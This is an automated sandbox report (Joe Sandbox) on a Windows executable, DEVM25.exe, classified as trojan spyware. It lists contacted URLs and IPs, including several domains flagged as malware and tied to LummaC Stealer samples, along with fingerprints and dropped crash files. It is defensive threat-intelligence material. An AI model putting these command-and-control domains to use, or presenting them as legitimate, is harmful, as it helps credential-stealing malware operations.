https://web.telegram.org	DEVM25.exe, 00000002.00000003.954902553.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.954876794.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://mrodularmall.top/s	DEVM25.exe, 00000002.00000003.1039180910.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1040674968.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.ecosia.org/newtab/v20Y&	DEVM25.exe, 00000002.00000003.973003175.0000000003588000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mrodularmall.top/aNzS6y	DEVM25.exe, 00000002.00000003.1040674968.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1672292234.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000002.2191865897.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1672397247.0000000000ABA000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1048472786.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1061225731.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://featureccus.shop/bdMAn	DEVM25.exe, 00000002.00000003.966232662.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	DEVM25.exe, 00000002.00000003.973003175.0000000003588000.00000004.00000800.00020000.00000000.sdmp	false		high
https://menuedgarli.shop/AUIqn	DEVM25.exe, 00000002.00000003.966232662.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	DEVM25.exe, 00000002.00000003.973003175.0000000003588000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mrodularmall.top/aNzSY	DEVM25.exe, 00000002.00000003.966232662.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://x1.c.lencr.org/0	DEVM25.exe, 00000002.00000003.1000943293.000000000357D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	DEVM25.exe, 00000002.00000003.1000943293.000000000357D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mrodularmall.top/aNzSyb?	DEVM25.exe, 00000002.00000003.989214929.0000000000AE5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	DEVM25.exe, 00000002.00000003.973003175.0000000003588000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mrodularmall.top/aNzSW	DEVM25.exe, 00000002.00000003.966232662.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.all	DEVM25.exe, 00000002.00000003.1001954181.000000000379C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mrodularmall.top/	DEVM25.exe, 00000002.00000003.1040674968.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1048472786.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://mrodularmall.top/aNzSFB	DEVM25.exe, 00000002.00000003.989214929.0000000000AE5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://jowinjoinery.icu/P	DEVM25.exe, 00000002.00000003.1672573469.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1672292234.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1672397247.0000000000ABA000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000002.2191965420.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	DEVM25.exe, 00000002.00000003.973003175.0000000003588000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	DEVM25.exe, 00000002.00000003.1000943293.000000000357D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org?q=	DEVM25.exe, 00000002.00000003.973003175.0000000003588000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.5.dr	false		high
https://featureccus.shop/bdMAn6	DEVM25.exe, 00000002.00000003.966232662.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ocsp.rootca1.amazontrust.com0:	DEVM25.exe, 00000002.00000003.1000943293.000000000357D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	DEVM25.exe, 00000002.00000003.1001954181.000000000379C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.	DEVM25.exe, 00000002.00000003.1002300071.0000000003571000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mrodularmall.top/aNzSAy	DEVM25.exe, 00000002.00000003.1040674968.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://mrodularmall.top:443/aNzS4d	DEVM25.exe, 00000002.00000003.1024350882.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://web.telegram.orgX-Frame-OptionsALLOW-FROM	DEVM25.exe, 00000002.00000003.954902553.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtabv20	DEVM25.exe, 00000002.00000003.973003175.0000000003588000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	DEVM25.exe, 00000002.00000003.1000943293.000000000357D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=13fe98fc6205fb6c6f_858247691958	DEVM25.exe, 00000002.00000003.954902553.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	DEVM25.exe, 00000002.00000003.1002300071.0000000003571000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	DEVM25.exe, 00000002.00000003.1002300071.0000000003571000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	DEVM25.exe, 00000002.00000003.973003175.0000000003588000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	DEVM25.exe, 00000002.00000003.973003175.0000000003588000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.97.3	jowinjoinery.icu	European Union	13335	CLOUDFLARENETUS	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
104.21.80.1	mrodularmall.top	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1638405
Start date and time:	2025-03-14 11:46:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DEVM25.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/6@5/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 92% Number of executed functions: 18 Number of non-executed functions: 140
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WerFault.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 40.71.69.253, 23.60.203.209, 20.190.160.3, 20.109.210.53, 2.23.227.208
Excluded domains from analysis (whitelisted): onedsblobvmssprdeus03.eastus.cloudapp.azure.com, www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, c.pki.goog
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
06:47:11	API Interceptor	8x Sleep call for process: DEVM25.exe modified
06:47:19	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	Circular No.12-7 Quotation.exe	Get hash	malicious	FormBook	Browse	www.shuangunder.shop/udq7/
	http://sg-adh7.vv.885210.xyz/	Get hash	malicious	Unknown	Browse	sg-adh7.vv.885210.xyz/favicon.ico
	http://caixadirectasecdigital.com/	Get hash	malicious	HTMLPhisher	Browse	caixadirectasecdigital.com/favicon.ico
	PO NO 28950.exe	Get hash	malicious	FormBook	Browse	www.tether1.xyz/focp/
	RFQ- Italy.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.xploitation.net/sqjz/
	Enquiry Quote - 21834-01.exe	Get hash	malicious	FormBook	Browse	www.joeyvv.xyz/b80n/
	DcbI6OM1wO.exe	Get hash	malicious	Lokibot, PureLog Stealer, zgRAT	Browse	ddrtot.shop/New/PWS/fre.php
	kVPzMgJglW.exe	Get hash	malicious	FormBook	Browse	www.timeinsardinia.info/j4nd/
	tnZI8EzSx3.exe	Get hash	malicious	FormBook	Browse	www.braposaldesk.cyou/3it7/
	zzSk99EqY0.exe	Get hash	malicious	FormBook	Browse	www.braposaldesk.cyou/3it7/
149.154.167.99	http://45.142.208.144.sslip.io/blog/	Get hash	malicious	Unknown	Browse	telegram.org/img/emoji/40/F09F9889.png
	http://xn--r1a.website/s/ogorodru	Get hash	malicious	Unknown	Browse	telegram.org/img/favicon.ico
	http://cryptorabotakzz.com/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://cache.netflix.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
	http://investors.spotify.com.sg2.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://bekaaviator.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegramtw1.org/	Get hash	malicious	Unknown	Browse	telegram.org/?setln=pl
	http://makkko.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegram.dog	Get hash	malicious	Unknown	Browse	telegram.dog/
	LnSNtO8JIa.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mrodularmall.top	random(7).exe	Get hash	malicious	LummaC Stealer	Browse	104.21.112.1
	random(1).exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	RbCSdRdU5F.exe	Get hash	malicious	Unknown	Browse	104.21.48.1
	RbCSdRdU5F.exe	Get hash	malicious	Unknown	Browse	104.21.64.1
	setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1
	FusionLoader v2.1.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.64.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.1
	file.exe	Get hash	malicious	Unknown	Browse	104.21.64.1
	file.exe	Get hash	malicious	Unknown	Browse	104.21.16.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.112.1
t.me	https://qey.oqp.mybluehost.me/website_bdd588a9/wp-content/upgrade/index.php	Get hash	malicious	Unknown	Browse	162.241.225.21
	ShadowLoader.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	RbCSdRdU5F.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	RbCSdRdU5F.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	Portals.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	Portals.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://auth.microsites.m-atelier.cz/redir?url=https://telegra.ph/Charlotte-Reeves-03-13&data=05%7C02%7Cteat@test.com%7Cf85134ec55e24fa0741708dd623d50ea%7C22def1f7e945453d836bda7282c42443%7C0%7C0%7C638774737677482831%7CUnknown%7CTWFpbGZsb3d8eyJFbXB0eU1hcGkiOnRydWUsIlYiOiIwLjAuMDAwMCIsIlAiOiJXaW4zMiIsIkFOIjoiTWFpbCIsIldUIjoyfQ==%7C0%7C%7C%7C&sdata=AFWlQKGCYsB3szoYr99UdtJsHEuv5b0KPmvHih+dvhk=&reserved=0	Get hash	malicious	Unknown	Browse	149.154.167.99
	ngbtiladkrthgad.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	CheatInjector.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	SimpleLoader v2.1.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
jowinjoinery.icu	RbCSdRdU5F.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	RbCSdRdU5F.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	setup.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	FusionLoader v2.1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	nvtoaldlrg.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	believe.ps1	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	ShadowLoader.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	INV000001203.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	http://iono-webnail.vercel.app/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	RbCSdRdU5F.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	RbCSdRdU5F.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	general2.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	Portals.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	Portals.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	SecuriteInfo.com.W32.Lolbas.A.tr.29609.16284.exe	Get hash	malicious	ScreenConnect Tool	Browse	172.67.179.181
	RATbuilderbyenwyry.exe.bin.exe	Get hash	malicious	Discord Rat	Browse	162.159.134.234
	https://verifica-sow-portafoglio.com/sow.php	Get hash	malicious	Unknown	Browse	172.67.69.226
	RATbuilderbyenwyry.exe.bin.exe	Get hash	malicious	Discord Rat	Browse	162.159.134.234
	start.ps1	Get hash	malicious	Unknown	Browse	104.21.22.104
	Circular No.12-7 Quotation.exe	Get hash	malicious	FormBook	Browse	104.21.27.203
	f38186770bffa4a12a7170942b9c0d71ac736142924da24a.ps1	Get hash	malicious	Unknown	Browse	104.17.151.117
	Quotation.exe	Get hash	malicious	FormBook	Browse	172.67.219.165
	https://mietamasklogiene.webflow.io/	Get hash	malicious	HTMLPhisher	Browse	172.66.0.227
	https://aerodromeo.finance	Get hash	malicious	Unknown	Browse	104.17.25.14
CLOUDFLARENETUS	SecuriteInfo.com.W32.Lolbas.A.tr.29609.16284.exe	Get hash	malicious	ScreenConnect Tool	Browse	172.67.179.181
	RATbuilderbyenwyry.exe.bin.exe	Get hash	malicious	Discord Rat	Browse	162.159.134.234
	https://verifica-sow-portafoglio.com/sow.php	Get hash	malicious	Unknown	Browse	172.67.69.226
	RATbuilderbyenwyry.exe.bin.exe	Get hash	malicious	Discord Rat	Browse	162.159.134.234
	start.ps1	Get hash	malicious	Unknown	Browse	104.21.22.104
	Circular No.12-7 Quotation.exe	Get hash	malicious	FormBook	Browse	104.21.27.203
	f38186770bffa4a12a7170942b9c0d71ac736142924da24a.ps1	Get hash	malicious	Unknown	Browse	104.17.151.117
	Quotation.exe	Get hash	malicious	FormBook	Browse	172.67.219.165
	https://mietamasklogiene.webflow.io/	Get hash	malicious	HTMLPhisher	Browse	172.66.0.227
	https://aerodromeo.finance	Get hash	malicious	Unknown	Browse	104.17.25.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	random(7).exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3 149.154.167.99 104.21.80.1
	random.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3 149.154.167.99 104.21.80.1
	random(8).exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3 149.154.167.99 104.21.80.1
	Set-up.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	188.114.97.3 149.154.167.99 104.21.80.1
	ShadowLoader.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3 149.154.167.99 104.21.80.1
	Go7yA2t.exe	Get hash	malicious	DarkVision Rat	Browse	188.114.97.3 149.154.167.99 104.21.80.1
	gtjFHJI.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3 149.154.167.99 104.21.80.1
	Launcher.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	188.114.97.3 149.154.167.99 104.21.80.1
	random(1).exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3 149.154.167.99 104.21.80.1
	OwPn5E9.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3 149.154.167.99 104.21.80.1

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_DEVM25.exe_2871c4a7abf9ed68c23d8c9482599cc5797388_9ddfdaa4_d18d61bf-557a-43c1-932c-c06bdb909452\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7150506162559892
Encrypted:	false
SSDEEP:	192:QNtyoRR90BU/HW7j/+zuiFWZ24IO8n13:yRR+BU/AjmzuiFWY4IO81
MD5:	2622B69325F3CD42EE89BACF107A1552
SHA1:	E9011784EEF2CB0CB81C7B6DF1ACB04DFB3A6114
SHA-256:	CA46ABF5250EA29886BBBD96A71E02C178E52B3FB0C4B65F1D4737028B07F4F8
SHA-512:	40A8919861AEFE99D8763A4706ACCF56AE341102A16EB72C46D3D5E2171346F4C7F6DD89FC601E88F210A4B0A67609D58762142C9633F82265E79E755C740742
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.4.2.2.8.3.1.5.0.3.6.1.5.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.4.2.2.8.3.2.8.4.7.3.7.1.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.1.8.d.6.1.b.f.-.5.5.7.a.-.4.3.c.1.-.9.3.2.c.-.c.0.6.b.d.b.9.0.9.4.5.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.5.8.3.4.2.4.5.-.5.a.5.9.-.4.a.6.9.-.a.5.4.a.-.0.0.8.2.0.9.2.3.c.4.1.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.D.E.V.M.2.5...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.f.0.-.0.0.0.1.-.0.0.1.8.-.a.7.4.9.-.7.4.6.f.c.e.9.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.3.3.3.7.2.1.a.e.9.4.2.a.5.6.0.5.0.c.3.c.2.b.3.1.b.7.3.3.d.4.a.0.0.0.0.f.f.f.f.!.0.0.0.0.d.1.e.2.e.f.9.9.4.1.c.d.6.4.4.6.4.f.0.7.2.c.6.b.8.0.5.7.d.d.2.4.1.2.b.8.d.d.6.c.!.D.E.V.M.2.5...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.5././.0.3./.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE58A.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Mar 14 10:47:11 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	36998
Entropy (8bit):	1.7584069837085017
Encrypted:	false
SSDEEP:	96:5y8iSGBFDvGFQwadU9N3MxDIi7O6x3ghShtg2y1sgVtxchYP3Y/WInWIHKIB9nOy:PxTa03ccOiY5y1FR2nO3NF/S
MD5:	9AEBE86C23842DA44923ED74E748AD98
SHA1:	E9A67C38814700B8C21FCB6DE97A7842D7D0FBB9
SHA-256:	BDB518ADDDA5CFD18406CEB336202BE120414DCC3EFDC83B80BC8312A84AB15C
SHA-512:	AFCB1CD5B39079F3828CBF8FFA85D6F75E98000F46BA2B710F53F7FB3E7B69CFF30CA35064F15DF26E80A377D4553D6EE9563B80D459166445330A9DD899D4C2
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ......./..g........................0...............^...........T.......8...........T.......................................................................................................................eJ......P.......GenuineIntel............T...........-..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE750.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8386
Entropy (8bit):	3.698135137748128
Encrypted:	false
SSDEEP:	192:R6l7wVeJgy6L6YKPSU9wgmf5wpr589bQIsfkGQm:R6lXJF6L6YySU9wgmf57Q7f5
MD5:	26976130A29DABF54276A60FED44C73B
SHA1:	9E19C67C288AC7242ECD7C5A1CE9115E698B2331
SHA-256:	449DF8BA7458241C2BB0EC5D78F4267DAE5BFFF4708090DFB0327D62F5C3E40E
SHA-512:	78358B264ED8AF92896DE69F4FF8EA4A32153F0B10EDB60F0BB8D139073C0427C2C93B30159046421C2635611BE4B1CB2659ADD467B8C4405A653531E8B2C6E0
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.4.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE926.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4700
Entropy (8bit):	4.473448598549628
Encrypted:	false
SSDEEP:	48:cvIwWl8zsCJg77aI9KtWpW8VY/Ym8M4JdPAF3+q8vJA1XDVEd:uIjfQI7cc7VjJMKezVEd
MD5:	FD2CBBD01AF1109A2306EF4610F357FC
SHA1:	6EA9A15A02E543ACC85770617B7EADF3849D882F
SHA-256:	E4A2FA60949019CC860B34FC955A046402C3517CD66174C0B55836CB1FD1B2CB
SHA-512:	F680F9CF681D77B15A775ABABA71D55D5EA07882556377550F82DE6320A6D40F7BE2AC82710A74DDA10BF41262EDA573BFD04FD230BC0F324B00DFA094F0B135
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="760429" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.398402397216992
Encrypted:	false
SSDEEP:	6144:O/4fiJoH0ncNXiUjt10qaG/gaocYGBoAWQqZaK7FIeC/FacXF+YfY8azg:44vFaMY6WQqYVtbV+c7
MD5:	D62A7F08424AC520EC88B199F625C7A0
SHA1:	32E58BFDAE40E3612D52356BCE573FA73B5A7525
SHA-256:	AF9F72171E5207C62DEB6766A8D5723F95B75B85AEC05A59328E63D2C7613667
SHA-512:	CBB2984B06E4B5473E8EEF6A69D726CCBBC0C2DF30C5DD13C52FF156717A8AF1F7B7AE15206411F6D937F5D083378EEE4DF3414B7231E0625C7469497CD163E9
Malicious:	false
Reputation:	low
Preview:	regfJ...J....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....f...............................................................................................................................................................................................................................................................................................................................................6..9........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	3.7498663594309765
Encrypted:	false
SSDEEP:	768:lnGDoy6VGYxwkwRx4baNWG0bAAmpsI8NZaX1u:lnMYXwY/9g
MD5:	6E3BCC16DD4BFECF81CBACB842D49388
